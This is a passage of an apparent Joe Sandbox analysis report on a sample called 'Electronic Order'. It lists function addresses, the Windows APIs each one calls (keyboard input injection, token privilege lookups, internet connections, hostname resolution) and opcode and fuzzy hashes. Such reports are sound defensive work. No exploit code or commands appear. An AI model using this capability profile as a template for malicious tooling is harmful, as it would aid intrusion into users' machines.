                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E2BB80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                      • String ID:
                                      • API String ID: 3321077145-0
                                      • Opcode ID: 5b2a4a869b1c6fae25c145a385d19077320528abdeb1dd94a00f78f2087b2c24
                                      • Instruction ID: 32adc9c450bd46d7d8f3963380c9b660f66cf9bf3ac68afeed6dcc3e082859e0
                                      • Opcode Fuzzy Hash: 5b2a4a869b1c6fae25c145a385d19077320528abdeb1dd94a00f78f2087b2c24
                                      • Instruction Fuzzy Hash: 17412B39200A11DFCB11EF25D599E5DBBE1EF49714B099498E84AAB362CB34FD01CFA1
                                      Function 00E48AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                      Download Yara Rule
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E48B4D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      • Opcode ID: 7c0ae72b91ce4bd33766c1785312beff46dff0c61178f531c2236188cfe26ee3
                                      • Instruction ID: 396ed97b5d155c5d57db6d2fd266294d6508a4d18308a76b781b45c2eb070018
                                      • Opcode Fuzzy Hash: 7c0ae72b91ce4bd33766c1785312beff46dff0c61178f531c2236188cfe26ee3
                                      • Instruction Fuzzy Hash: 1B3104B8640204BFEF249E18EE45FED37A4EB05318F246616FA45F72A0CE30AD409751
                                      Function 00E4ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ClientToScreen.USER32(?,?), ref: 00E4AE1A
                                      • GetWindowRect.USER32(?,?), ref: 00E4AE90
                                      • PtInRect.USER32(?,?,00E4C304), ref: 00E4AEA0
                                      • MessageBeep.USER32(00000000), ref: 00E4AF11
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Rect$BeepClientMessageScreenWindow
                                      • String ID:
                                      • API String ID: 1352109105-0
                                      • Opcode ID: c90b7feb97009939d6e53bede46bbc2872fe47f049655d40dc5141502bf6c230
                                      • Instruction ID: 87ba08de20998e844d75fbfd452ed7326105273928456b6b12636c1eb5977dab
                                      • Opcode Fuzzy Hash: c90b7feb97009939d6e53bede46bbc2872fe47f049655d40dc5141502bf6c230
                                      • Instruction Fuzzy Hash: D041B170640105DFCB15CF59E884B997BF5FF49360F1891B9E428EB261C730A846CF92
                                      Function 00E20FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E21037
                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00E21053
                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00E210B9
                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00E2110B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: d8bb3db5d071faea74c2a2829ae493247e2ee20eb38824d246c6b24ae2606afb
                                      • Instruction ID: 13333e17782c81e97b6daee5835b455e5369c0eb18c616021e4946806a416fa0
                                      • Opcode Fuzzy Hash: d8bb3db5d071faea74c2a2829ae493247e2ee20eb38824d246c6b24ae2606afb
                                      • Instruction Fuzzy Hash: AA319C30E406B8AEFF308B66AC05FFEBBA9AB65314F08529AE580721D1C3744FC58751
                                      Function 00E21121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00E21176
                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E21192
                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E211F1
                                      • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00E21243
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: 03430e5f3bc3c96a4fe4d4ca1bee5be7ee8a4080482e99b6c394f2cfb889c377
                                      • Instruction ID: 5e561835b3c2dd913837bc2fbdbf135336eb826679e413062241fb51c632360d
                                      • Opcode Fuzzy Hash: 03430e5f3bc3c96a4fe4d4ca1bee5be7ee8a4080482e99b6c394f2cfb889c377
                                      • Instruction Fuzzy Hash: 97314830A413689EEF208E65AC057FE7BAAAB69314F08639AF590B21E1C3344B659751
                                      Function 00DF6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00DF644B
                                      • __isleadbyte_l.LIBCMT ref: 00DF6479
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00DF64A7
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00DF64DD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: 4f597d25519881def4a1b5cb8d3785102eed05d38b64cd07a4502cdf6336631e
                                      • Instruction ID: 391ddf883bd8eb331b48ba9abd18436570a5c2464c149af4b99814572c399951
                                      • Opcode Fuzzy Hash: 4f597d25519881def4a1b5cb8d3785102eed05d38b64cd07a4502cdf6336631e
                                      • Instruction Fuzzy Hash: EB31D23160824EAFDB21AF75C845BBA7BB5FF41710F1A8029E96487591D731D890DBB0
                                      Function 00E45175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 00E45189
                                        • Part of subcall function 00E2387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E23897
                                        • Part of subcall function 00E2387D: GetCurrentThreadId.KERNEL32 ref: 00E2389E
                                        • Part of subcall function 00E2387D: AttachThreadInput.USER32(00000000,?,00E252A7), ref: 00E238A5
                                      • GetCaretPos.USER32(?), ref: 00E4519A
                                      • ClientToScreen.USER32(00000000,?), ref: 00E451D5
                                      • GetForegroundWindow.USER32 ref: 00E451DB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                      • String ID:
                                      • API String ID: 2759813231-0
                                      • Opcode ID: 90251c42081bdf97f188cdbfac533dbf02547743e305cba1afb58bf5eca9d5c5
                                      • Instruction ID: 41b4b5c2ed04a6a6b8d6bf7c081c95f652fb5bfd2a824c347bb2c448a89f6c3c
                                      • Opcode Fuzzy Hash: 90251c42081bdf97f188cdbfac533dbf02547743e305cba1afb58bf5eca9d5c5
                                      • Instruction Fuzzy Hash: EC312C76900109AFDB04EFA5D885EEFF7F9EF98300F10406AE415E7241EA759E45CBA0
                                      Function 00E4C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                      • GetCursorPos.USER32(?), ref: 00E4C7C2
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00DFBBFB,?,?,?,?,?), ref: 00E4C7D7
                                      • GetCursorPos.USER32(?), ref: 00E4C824
                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00DFBBFB,?,?,?), ref: 00E4C85E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                      • String ID:
                                      • API String ID: 2864067406-0
                                      • Opcode ID: efdb20515a32fd86f31dd140dee6ec34710a5932b63d9d421dc809dd7ebc2679
                                      • Instruction ID: 27ed319fd5e8ad0442e438ac56e86807e74d8d6cf43ac854ad991b94c151c029
                                      • Opcode Fuzzy Hash: efdb20515a32fd86f31dd140dee6ec34710a5932b63d9d421dc809dd7ebc2679
                                      • Instruction Fuzzy Hash: 3E310F35601018AFCB19CF5AD888EFA7BBAEB0D710F104069F908AB261D331AD50DFA0
                                      Function 00DE0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                      Download Yara Rule
                                      APIs
                                      • __setmode.LIBCMT ref: 00DE0BF2
                                        • Part of subcall function 00DC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E27B20,?,?,00000000), ref: 00DC5B8C
                                        • Part of subcall function 00DC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E27B20,?,?,00000000,?,?), ref: 00DC5BB0
                                      • _fprintf.LIBCMT ref: 00DE0C29
                                      • OutputDebugStringW.KERNEL32(?), ref: 00E16331
                                        • Part of subcall function 00DE4CDA: _flsall.LIBCMT ref: 00DE4CF3
                                      • __setmode.LIBCMT ref: 00DE0C5E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                      • String ID:
                                      • API String ID: 521402451-0
                                      • Opcode ID: 2c0b05e78b71d1328b5d7b3569c5cd5f4d24071aca1b1877a9189cc68a462f54
                                      • Instruction ID: 9f8025033643c16b0b055e0ae670ecc58f3c47c71309fc912c6d84ec1e161da6
                                      • Opcode Fuzzy Hash: 2c0b05e78b71d1328b5d7b3569c5cd5f4d24071aca1b1877a9189cc68a462f54
                                      • Instruction Fuzzy Hash: 6511E4329042456ECB04B7B6AC46EBEBB69DF85320F24015AF108A71D2DE615DC687B5
                                      Function 00E18B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00E18652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E18669
                                        • Part of subcall function 00E18652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E18673
                                        • Part of subcall function 00E18652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E18682
                                        • Part of subcall function 00E18652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E18689
                                        • Part of subcall function 00E18652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E1869F
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E18BEB
                                      • _memcmp.LIBCMT ref: 00E18C0E
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E18C44
                                      • HeapFree.KERNEL32(00000000), ref: 00E18C4B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                      • String ID:
                                      • API String ID: 1592001646-0
                                      • Opcode ID: 049fe74a08ac2a5be4840aa6da94b8d43a1ea6daf49543b14977586500c440d1
                                      • Instruction ID: 3710de35c7b8927119412f1b1a14337b6cbc8c70f4a80afc78eb7dfa489ed529
                                      • Opcode Fuzzy Hash: 049fe74a08ac2a5be4840aa6da94b8d43a1ea6daf49543b14977586500c440d1
                                      • Instruction Fuzzy Hash: BB216971E02208EFDB10DFA5CA45BEEB7B8EF54358F144059E854B7241DB31AA86CBA1
                                      Function 00E31A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E31A97
                                        • Part of subcall function 00E31B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E31B40
                                        • Part of subcall function 00E31B21: InternetCloseHandle.WININET(00000000), ref: 00E31BDD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Internet$CloseConnectHandleOpen
                                      • String ID:
                                      • API String ID: 1463438336-0
                                      • Opcode ID: 1687a46ffc20617c1336f39c61bc3074417e5ce602481528099ec300082ed664
                                      • Instruction ID: 4a1d1c34bb5e27f6f9fb54e1591d569034811f27b813d8404b0900a9593b6c86
                                      • Opcode Fuzzy Hash: 1687a46ffc20617c1336f39c61bc3074417e5ce602481528099ec300082ed664
                                      • Instruction Fuzzy Hash: FA219F35200601BFDB119F608C09FBABBA9FF45705F10506EFA51A6650EB75D815DBA0
                                      Function 00E1E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00E1F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E1E1C4,?,?,?,00E1EFB7,00000000,000000EF,00000119,?,?), ref: 00E1F5BC
                                        • Part of subcall function 00E1F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00E1F5E2
                                        • Part of subcall function 00E1F5AD: lstrcmpiW.KERNEL32(00000000,?,00E1E1C4,?,?,?,00E1EFB7,00000000,000000EF,00000119,?,?), ref: 00E1F613
                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E1EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E1E1DD
                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00E1E203
                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E1EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E1E237
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: lstrcmpilstrcpylstrlen
                                      • String ID: cdecl
                                      • API String ID: 4031866154-3896280584
                                      • Opcode ID: 1bee9e2a3acf74f1bf86ab40b1e3d2764635b9b1d60d1d27603ec51de9666a39
                                      • Instruction ID: efbfd722753ccb2b9e6f5b1cd7e0dabb70961fcf5c41b4138d1a9a32e9a74ce2
                                      • Opcode Fuzzy Hash: 1bee9e2a3acf74f1bf86ab40b1e3d2764635b9b1d60d1d27603ec51de9666a39
                                      • Instruction Fuzzy Hash: 3911D03A200341EFCB25AF64DC45DBA77A9FF89710B40902AF806DB260EB71D891C7A0
                                      Function 00DF5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00DF5351
                                        • Part of subcall function 00DE594C: __FF_MSGBANNER.LIBCMT ref: 00DE5963
                                        • Part of subcall function 00DE594C: __NMSG_WRITE.LIBCMT ref: 00DE596A
                                        • Part of subcall function 00DE594C: RtlAllocateHeap.NTDLL(01590000,00000000,00000001,00000000,?,?,?,00DE1013,?), ref: 00DE598F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: c1dc846951d11bf9956e11b8608591e7c841bb7342ddd80e46dc22639f0fcf72
                                      • Instruction ID: 4e60eb4cb660dfb7d10d6cd8baed283981d2d593f1d1701d08aa0d6c28714e64
                                      • Opcode Fuzzy Hash: c1dc846951d11bf9956e11b8608591e7c841bb7342ddd80e46dc22639f0fcf72
                                      • Instruction Fuzzy Hash: CC110432404A1AAECB213F7ABC0467D37D8DF013A0F158429FB49AA195DA7289419770
                                      Function 00DC4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00DC4560
                                        • Part of subcall function 00DC410D: _memset.LIBCMT ref: 00DC418D
                                        • Part of subcall function 00DC410D: _wcscpy.LIBCMT ref: 00DC41E1
                                        • Part of subcall function 00DC410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DC41F1
                                      • KillTimer.USER32(?,00000001,?,?), ref: 00DC45B5
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DC45C4
                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DFD6CE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                      • String ID:
                                      • API String ID: 1378193009-0
                                      • Opcode ID: 47f59e8a8fece02a02dd249d34ae1a947668bb954d15d59f9871d315fc4bb14c
                                      • Instruction ID: 1efc194b66ae94b86eb520ff20c822e8d4c2083023b3f1cb731376dc5ae6ff98
                                      • Opcode Fuzzy Hash: 47f59e8a8fece02a02dd249d34ae1a947668bb954d15d59f9871d315fc4bb14c
                                      • Instruction Fuzzy Hash: 5621D770904788AFEB328B24D859FF7BBED9F01304F04409EE79EA7241C7745A899B61
                                      Function 00E3667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E27B20,?,?,00000000), ref: 00DC5B8C
                                        • Part of subcall function 00DC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E27B20,?,?,00000000,?,?), ref: 00DC5BB0
                                      • gethostbyname.WSOCK32(?,?,?), ref: 00E366AC
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E366B7
                                      • _memmove.LIBCMT ref: 00E366E4
                                      • inet_ntoa.WSOCK32(?), ref: 00E366EF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                      • String ID:
                                      • API String ID: 1504782959-0
                                      • Opcode ID: d1ed22d670a6857b413a676da3ff991639cdfb6692a69597b03de4aec544d169
